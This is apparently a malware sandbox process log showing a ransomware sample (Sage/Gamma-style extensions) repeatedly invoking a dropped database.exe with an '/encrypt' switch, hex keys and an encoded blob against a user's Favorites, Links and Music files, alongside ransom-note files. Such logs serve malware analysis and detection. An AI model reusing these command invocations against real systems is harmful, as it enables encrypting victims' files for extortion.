C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Windows Live\Windows Live Gallery.url.gif"5⤵PID:6096
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Windows Live\Windows Live Mail.url.gif"5⤵PID:6068
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Windows Live\Windows Live Spaces.url.gif"5⤵PID:3320
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Links\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:5296
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Links\Desktop.lnk.gif"5⤵PID:6460
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Links\Downloads.lnk.gif"5⤵PID:1744
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Links\RecentPlaces.lnk.gif"5⤵PID:5848
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Links\Restore-My-Files.txt"5⤵PID:2872
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\!HELP_SOS.hta.gif"5⤵PID:5392
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\#Decrypt_Files_ReadMe#.rtf.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:3760
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\0mdLDRha-sb7ecrQQ.[[email protected]].gif"5⤵PID:5124
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\ApproveProtect.xps.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:1624
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\BackupSend.mpe.sage.gif"5⤵PID:4356
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\CompareRead.wav.sage.gif"5⤵PID:3332
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\CompleteEnable.wma.sage.gif"5⤵PID:3884
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6568
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\DismountWatch.wmx.sage.gif"5⤵PID:3128
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\EnterGet.vb.sage.gif"5⤵PID:6088
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\FindRestart.DVR.sage.gif"5⤵PID:4672
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\FormatLock.ps1.gif"5⤵PID:5356
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\InstallCheckpoint.ttc.gif"5⤵PID:6376
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\InvokeOpen.potx.sage.gif"5⤵PID:4764
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\JoinRegister.wmf.sage.gif"5⤵PID:3820
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\LimitApprove.eps.sage.gif"5⤵PID:6612
-
-
